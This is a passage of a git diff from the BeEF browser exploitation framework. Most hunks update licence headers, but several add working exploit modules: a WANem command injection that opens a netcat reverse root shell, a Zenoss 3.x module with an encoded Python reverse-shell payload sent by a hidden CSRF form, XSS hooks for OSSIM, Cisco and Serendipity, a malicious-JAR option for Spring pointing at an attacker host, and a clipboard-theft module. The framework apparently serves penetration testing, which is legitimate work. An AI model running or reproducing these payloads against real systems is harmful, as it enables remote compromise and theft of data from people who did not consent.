2.5.0 to 2.5.7 (subscription customers)" + authors: ["bcoles"] + target: + unknown: ["ALL"] diff --git a/modules/exploits/spring_framework_malicious_jar/module.rb b/modules/exploits/spring_framework_malicious_jar/module.rb new file mode 100644 index 000000000..81fb3e9c8 --- /dev/null +++ b/modules/exploits/spring_framework_malicious_jar/module.rb @@ -0,0 +1,19 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Spring_framework_malicious_jar < BeEF::Core::Command + + def self.options + return [ + {'name' => 'form_controller', 'ui_label' => 'Form Controller URL', 'value' => 'http://target/path/to/form/controller'}, + {'name' => 'jar_file', 'ui_label' => 'Malicious JAR file URL', 'value' => 'http://attacker/path/to/attack.jar!/'} + ] + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end diff --git a/modules/exploits/switch/netgear_gs108t_csrf/command.js b/modules/exploits/switch/netgear_gs108t_csrf/command.js index a2f13c118..d812993dc 100644 --- a/modules/exploits/switch/netgear_gs108t_csrf/command.js +++ b/modules/exploits/switch/netgear_gs108t_csrf/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var base = '<%= @base %>'; var oldpassword = '<%= @oldpassword %>'; diff --git a/modules/exploits/switch/netgear_gs108t_csrf/config.yaml b/modules/exploits/switch/netgear_gs108t_csrf/config.yaml index 6402686d4..6d363e279 100644 --- a/modules/exploits/switch/netgear_gs108t_csrf/config.yaml +++ b/modules/exploits/switch/netgear_gs108t_csrf/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/exploits/switch/netgear_gs108t_csrf/module.rb b/modules/exploits/switch/netgear_gs108t_csrf/module.rb index e4ca0a105..0dda11a2b 100644 --- a/modules/exploits/switch/netgear_gs108t_csrf/module.rb +++ b/modules/exploits/switch/netgear_gs108t_csrf/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Netgear_gs108t_csrf < BeEF::Core::Command diff --git a/modules/exploits/vtiger_crm_upload_exploit/command.js b/modules/exploits/vtiger_crm_upload_exploit/command.js index f95758eb6..4702ad6df 100644 --- a/modules/exploits/vtiger_crm_upload_exploit/command.js +++ b/modules/exploits/vtiger_crm_upload_exploit/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + // VtigerCRM <= 5.0.4 "chained exploitation" PoC // Hacked up for OWASP New Zealand Day, July 13th 2009 // diff --git a/modules/exploits/vtiger_crm_upload_exploit/config.yaml b/modules/exploits/vtiger_crm_upload_exploit/config.yaml index 1f10055aa..470e0f742 100644 --- a/modules/exploits/vtiger_crm_upload_exploit/config.yaml +++ b/modules/exploits/vtiger_crm_upload_exploit/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/exploits/vtiger_crm_upload_exploit/module.rb b/modules/exploits/vtiger_crm_upload_exploit/module.rb index ad2d6f0bc..16483715b 100644 --- a/modules/exploits/vtiger_crm_upload_exploit/module.rb +++ b/modules/exploits/vtiger_crm_upload_exploit/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Vtiger_crm_upload_exploit < BeEF::Core::Command diff --git a/modules/exploits/wanem_command_execution/command.js b/modules/exploits/wanem_command_execution/command.js new file mode 100644 index 000000000..7f6fe06e6 --- /dev/null +++ b/modules/exploits/wanem_command_execution/command.js @@ -0,0 +1,24 @@ +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + var rhost = '<%= @rhost %>'; + var rport = '<%= @rport %>'; + var lhost = '<%= @lhost %>'; + var lport = '<%= @lport %>'; + + var wanem_iframe = beef.dom.createInvisibleIframe(); + wanem_iframe.setAttribute('src', 'http://'+rhost+':'+rport+'/WANem/result.php?pc=127.0.0.1;/UNIONFS/home/perc/dosu%20{nc,'+lhost+','+lport+',-e,/bin/sh}%26'); + + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); + + cleanup = function() { + document.body.removeChild(wanem_iframe); + } + setTimeout("cleanup()", 15000); + +}); + diff --git a/modules/exploits/wanem_command_execution/config.yaml b/modules/exploits/wanem_command_execution/config.yaml new file mode 100644 index 000000000..42660a410 --- /dev/null +++ b/modules/exploits/wanem_command_execution/config.yaml @@ -0,0 +1,18 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +################################################################################ +# For more information see: http://itsecuritysolutions.org/2012-08-12-WANem-v2.3-multiple-vulnerabilities/ +################################################################################ +beef: + module: + wanem_command_execution: + enable: true + category: "Exploits" + name: "WAN Emulator Command Execution" + description: "Attempts to get a reverse root shell on a WAN Emulator server.
Tested on version 2.3 however other versions are likely to be vulnerable." + authors: ["bcoles"] + target: + working: ["ALL"] diff --git a/modules/exploits/wanem_command_execution/module.rb b/modules/exploits/wanem_command_execution/module.rb new file mode 100644 index 000000000..ca8d01c1b --- /dev/null +++ b/modules/exploits/wanem_command_execution/module.rb @@ -0,0 +1,27 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +################################################################################ +# For more information see: http://itsecuritysolutions.org/2012-08-12-WANem-v2.3-multiple-vulnerabilities/ +################################################################################ +class Wanem_command_execution < BeEF::Core::Command + + def self.options + configuration = BeEF::Core::Configuration.instance + lhost = "#{configuration.get("beef.http.host")}" + lhost = "" if lhost == "0.0.0.0" + return [ + { 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.1.1'}, + { 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' }, + { 'name' => 'lhost', 'ui_label' => 'Local Host', 'value' => lhost}, + { 'name' => 'lport', 'ui_label' => 'Local Port', 'value' => '4444'}, + ] + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end diff --git a/modules/exploits/window_mail_client_dos/config.yaml b/modules/exploits/window_mail_client_dos/config.yaml deleted file mode 100644 index 891f16919..000000000 --- a/modules/exploits/window_mail_client_dos/config.yaml +++ /dev/null @@ -1,26 +0,0 @@ -# -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -# -beef: - module: - windows_mail_client_dos: - enable: true - category: "Exploits" - name: "Windows Mail Client DoS" - description: "This module exploits an unhandled exception in Windows Mail to crash the client remotely.

Windows Mail is launched and then crashed if it is not already open. It comes installed by default on Windows Vista (but it's also vulnerable on Windows 7 SP2).

The protocol handler used will be: nntp." - authors: ["bcoles"] - target: - user_notify: ["FF", "S"] - not_working: ["All"] diff --git a/modules/exploits/xss/alienvault_ossim_3.1_xss/command.js b/modules/exploits/xss/alienvault_ossim_3.1_xss/command.js new file mode 100644 index 000000000..562181c00 --- /dev/null +++ b/modules/exploits/xss/alienvault_ossim_3.1_xss/command.js @@ -0,0 +1,17 @@ +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + + var uri = '<%= @uri.gsub(/'/, "\\'") %>'; + + var alienvault_iframe_<%= @command_id %> = beef.dom.createInvisibleIframe(); + alienvault_iframe_<%= @command_id %>.setAttribute('src', uri); + + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); + +}); + diff --git a/modules/exploits/xss/alienvault_ossim_3.1_xss/config.yaml b/modules/exploits/xss/alienvault_ossim_3.1_xss/config.yaml new file mode 100644 index 000000000..5f5a8926a --- /dev/null +++ b/modules/exploits/xss/alienvault_ossim_3.1_xss/config.yaml @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + alienvault_ossim_3_1_xss: + enable: true + category: ["Exploits", "XSS"] + name: "AlienVault OSSIM 3.1 XSS" + description: "Attempts to hook AlienVault OSSIM 3.1 using XSS.
For more information see: http://www.exploit-db.com/exploits/20062/" + authors: ["bcoles", "muts"] + target: + unknown: ["ALL"] diff --git a/modules/exploits/xss/alienvault_ossim_3.1_xss/module.rb b/modules/exploits/xss/alienvault_ossim_3.1_xss/module.rb new file mode 100644 index 000000000..9070c0f95 --- /dev/null +++ b/modules/exploits/xss/alienvault_ossim_3.1_xss/module.rb @@ -0,0 +1,23 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Alienvault_ossim_3_1_xss < BeEF::Core::Command + + def self.options + + configuration = BeEF::Core::Configuration.instance + hook_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js" + + return [ + {'name' => 'uri', 'ui_label' => 'Target URL', 'value' => 'http://target/ossim/top.php?option=3&soption=3&url='} + ] + + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end diff --git a/modules/exploits/xss/cisco_collaboration_server_5_xss/command.js b/modules/exploits/xss/cisco_collaboration_server_5_xss/command.js new file mode 100644 index 000000000..ff643b786 --- /dev/null +++ b/modules/exploits/xss/cisco_collaboration_server_5_xss/command.js @@ -0,0 +1,17 @@ +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + + var uri = '<%= @uri.gsub(/'/, "\\'") %>'; + + var cisco_collaboration_iframe = beef.dom.createInvisibleIframe(); + cisco_collaboration_iframe.setAttribute('src', uri); + + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); + +}); + diff --git a/modules/exploits/xss/cisco_collaboration_server_5_xss/config.yaml b/modules/exploits/xss/cisco_collaboration_server_5_xss/config.yaml new file mode 100644 index 000000000..8ad1a6ccc --- /dev/null +++ b/modules/exploits/xss/cisco_collaboration_server_5_xss/config.yaml @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + cisco_collaboration_server_5_xss: + enable: true + category: ["Exploits", "XSS"] + name: "Cisco Collaboration Server 5 XSS" + description: "Attempts to hook Cisco Collaboration Server 5 using XSS.
For more information see: http://www.exploit-db.com/exploits/11403/" + authors: ["bcoles", "s4squatch"] + target: + unknown: ["ALL"] diff --git a/modules/exploits/xss/cisco_collaboration_server_5_xss/module.rb b/modules/exploits/xss/cisco_collaboration_server_5_xss/module.rb new file mode 100644 index 000000000..75b55ba40 --- /dev/null +++ b/modules/exploits/xss/cisco_collaboration_server_5_xss/module.rb @@ -0,0 +1,23 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Cisco_collaboration_server_5_xss < BeEF::Core::Command + + def self.options + + configuration = BeEF::Core::Configuration.instance + hook_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js" + + return [ + {'name' => 'uri', 'ui_label' => 'Target URL', 'value' => 'http://target/webline/html/admin/wcs/LoginPage.jhtml?oper=&dest=">'} + ] + + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end diff --git a/modules/exploits/xss/serendipity_1.6_xss/command.js b/modules/exploits/xss/serendipity_1.6_xss/command.js new file mode 100644 index 000000000..71c8bf1c4 --- /dev/null +++ b/modules/exploits/xss/serendipity_1.6_xss/command.js @@ -0,0 +1,17 @@ +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + + var uri = '<%= @uri.gsub(/'/, "\\'") %>'; + + var serendipity_iframe = beef.dom.createInvisibleIframe(); + serendipity_iframe.setAttribute('src', uri); + + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); + +}); + diff --git a/modules/exploits/xss/serendipity_1.6_xss/config.yaml b/modules/exploits/xss/serendipity_1.6_xss/config.yaml new file mode 100644 index 000000000..472bab376 --- /dev/null +++ b/modules/exploits/xss/serendipity_1.6_xss/config.yaml @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + serendipity_1_6_xss: + enable: true + category: ["Exploits", "XSS"] + name: "Serendipity <= 1.6 XSS" + description: "Attempts to hook Serendipity <= 1.6 using XSS.
For more information see: http://www.exploit-db.com/exploits/18884/" + authors: ["bcoles", "Stefan Schurtz"] + target: + unknown: ["ALL"] diff --git a/modules/exploits/xss/serendipity_1.6_xss/module.rb b/modules/exploits/xss/serendipity_1.6_xss/module.rb new file mode 100644 index 000000000..fd4b1afdc --- /dev/null +++ b/modules/exploits/xss/serendipity_1.6_xss/module.rb @@ -0,0 +1,23 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Serendipity_1_6_xss < BeEF::Core::Command + + def self.options + + configuration = BeEF::Core::Configuration.instance + hook_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js" + + return [ + {'name' => 'uri', 'ui_label' => 'Target URL', 'value' => 'http://target/serendipity/serendipity_admin_image_selector.php?serendipity[textarea]=\'"'} + ] + + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end diff --git a/modules/exploits/zenoss_3x_command_execution/command.js b/modules/exploits/zenoss_3x_command_execution/command.js new file mode 100644 index 000000000..087133372 --- /dev/null +++ b/modules/exploits/zenoss_3x_command_execution/command.js @@ -0,0 +1,34 @@ +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + var rhost = '<%= @rhost %>'; + var rport = '<%= @rport %>'; + var lhost = '<%= @lhost %>'; + var lport = '<%= @lport %>'; + var user = '<%= @user %>'; + var pass = '<%= @pass %>'; + var target = 'http://'+rhost+':'+rport+'/zport/About/showDaemonXMLConfig' + + // reverse python payload + var payload = unescape('%70%79%74%68%6f%6e%20%2d%63%20%22%69%6d%70%6f%72%74%20%73%6f%63%6b%65%74%2c%73%75%62%70%72%6f%63%65%73%73%2c%6f%73%3b%68%6f%73%74%3d%5c%22'+lhost+'%5c%22%3b%70%6f%72%74%3d'+lport+'%3b%73%3d%73%6f%63%6b%65%74%2e%73%6f%63%6b%65%74%28%73%6f%63%6b%65%74%2e%41%46%5f%49%4e%45%54%2c%73%6f%63%6b%65%74%2e%53%4f%43%4b%5f%53%54%52%45%41%4d%29%3b%73%2e%63%6f%6e%6e%65%63%74%28%28%68%6f%73%74%2c%70%6f%72%74%29%29%3b%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%30%29%3b%20%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%31%29%3b%20%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%32%29%3b%70%3d%73%75%62%70%72%6f%63%65%73%73%2e%63%61%6c%6c%28%5b%5c%22%2f%62%69%6e%2f%73%68%5c%22%2c%5c%22%2d%69%5c%22%5d%29%3b%22') + + // send request + var zenoss_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(target, "POST", [ + {'type':'hidden', 'name':'__ac_name', 'value':user}, + {'type':'hidden', 'name':'__ac_password', 'value':pass}, + {'type':'hidden', 'name':'daemon', 'value':payload} + ]); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); + + // clean up + cleanup = function() { + document.body.removeChild(zenoss_iframe_<%= @command_id %>); + } + setTimeout("cleanup()", 15000); + +}); + diff --git a/modules/exploits/zenoss_3x_command_execution/config.yaml b/modules/exploits/zenoss_3x_command_execution/config.yaml new file mode 100644 index 000000000..5786425da --- /dev/null +++ b/modules/exploits/zenoss_3x_command_execution/config.yaml @@ -0,0 +1,18 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +################################################################################ +# For more information see: http://itsecuritysolutions.org/2012-07-30-zenoss-3.2.1-multiple-security-vulnerabilities/ +################################################################################ +beef: + module: + zenoss_command_execution: + enable: true + category: "Exploits" + name: "Zenoss 3.x Command Execution" + description: "Attempts to get a reverse shell on a Zenoss 3.x server. Valid credentials are required." + authors: ["bcoles"] + target: + working: ["ALL"] diff --git a/modules/exploits/zenoss_3x_command_execution/module.rb b/modules/exploits/zenoss_3x_command_execution/module.rb new file mode 100644 index 000000000..c79f60193 --- /dev/null +++ b/modules/exploits/zenoss_3x_command_execution/module.rb @@ -0,0 +1,29 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +################################################################################ +# For more information see: http://itsecuritysolutions.org/2012-07-30-zenoss-3.2.1-multiple-security-vulnerabilities/ +################################################################################ +class Zenoss_command_execution < BeEF::Core::Command + + def self.options + configuration = BeEF::Core::Configuration.instance + lhost = "#{configuration.get("beef.http.host")}" + lhost = "" if lhost == "0.0.0.0" + return [ + { 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '127.0.0.1'}, + { 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '8080' }, + { 'name' => 'lhost', 'ui_label' => 'Local Host', 'value' => lhost}, + { 'name' => 'lport', 'ui_label' => 'Local Port', 'value' => '4444'}, + { 'name' => 'user', 'ui_label' => 'Username', 'value' => 'admin'}, + { 'name' => 'pass', 'ui_label' => 'Password', 'value' => 'zenoss'}, + ] + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end diff --git a/modules/exploits/zenoss_add_user_csrf/command.js b/modules/exploits/zenoss_add_user_csrf/command.js index 9650a2684..8727f8bc8 100644 --- a/modules/exploits/zenoss_add_user_csrf/command.js +++ b/modules/exploits/zenoss_add_user_csrf/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var base = '<%= @base %>'; var user_level = '<%= @user_level %>'; diff --git a/modules/exploits/zenoss_add_user_csrf/config.yaml b/modules/exploits/zenoss_add_user_csrf/config.yaml index 3ae083e7a..458e0c701 100644 --- a/modules/exploits/zenoss_add_user_csrf/config.yaml +++ b/modules/exploits/zenoss_add_user_csrf/config.yaml @@ -1,25 +1,15 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: zenoss_add_user_csrf: enable: true category: "Exploits" - name: "Zenoss Add User CSRF" - description: "Attempts to add a user to a Zenoss Core <= 3.2.1 server." + name: "Zenoss 3.x Add User CSRF" + description: "Attempts to add a user to a Zenoss Core 3.x server." authors: ["bcoles"] target: working: ["ALL"] diff --git a/modules/exploits/zenoss_add_user_csrf/module.rb b/modules/exploits/zenoss_add_user_csrf/module.rb index 28fac6d60..37eee8336 100644 --- a/modules/exploits/zenoss_add_user_csrf/module.rb +++ b/modules/exploits/zenoss_add_user_csrf/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Zenoss_add_user_csrf < BeEF::Core::Command diff --git a/modules/exploits/zenoss_daemon_csrf/command.js b/modules/exploits/zenoss_daemon_csrf/command.js index 4b753f8ea..0ef85cdce 100644 --- a/modules/exploits/zenoss_daemon_csrf/command.js +++ b/modules/exploits/zenoss_daemon_csrf/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var base = '<%= @base %>'; var service = '<%= @service %>'; diff --git a/modules/exploits/zenoss_daemon_csrf/config.yaml b/modules/exploits/zenoss_daemon_csrf/config.yaml index 9249f7d99..d3871c1d6 100644 --- a/modules/exploits/zenoss_daemon_csrf/config.yaml +++ b/modules/exploits/zenoss_daemon_csrf/config.yaml @@ -1,25 +1,15 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: zenoss_daemon_csrf: enable: true category: "Exploits" - name: "Zenoss Daemon CSRF" - description: "Attempts to start/stop/restart daemons on a Zenoss Core <= 3.2.1 server." + name: "Zenoss 3.x Daemon CSRF" + description: "Attempts to start/stop/restart daemons on a Zenoss Core 3.x server." authors: ["bcoles"] target: working: ["ALL"] diff --git a/modules/exploits/zenoss_daemon_csrf/module.rb b/modules/exploits/zenoss_daemon_csrf/module.rb index 148f0c6bf..d0e9c9693 100644 --- a/modules/exploits/zenoss_daemon_csrf/module.rb +++ b/modules/exploits/zenoss_daemon_csrf/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Zenoss_daemon_csrf < BeEF::Core::Command diff --git a/modules/host/clipboard_theft/command.js b/modules/host/clipboard_theft/command.js index 1c717da87..1f4db5740 100644 --- a/modules/host/clipboard_theft/command.js +++ b/modules/host/clipboard_theft/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { if (clipboardData.getData("Text") !== null) { beef.net.send("<%= @command_url %>", <%= @command_id %>, "clipboard="+clipboardData.getData("Text")); diff --git a/modules/host/clipboard_theft/config.yaml b/modules/host/clipboard_theft/config.yaml index ec30fcb28..b0f618fce 100644 --- 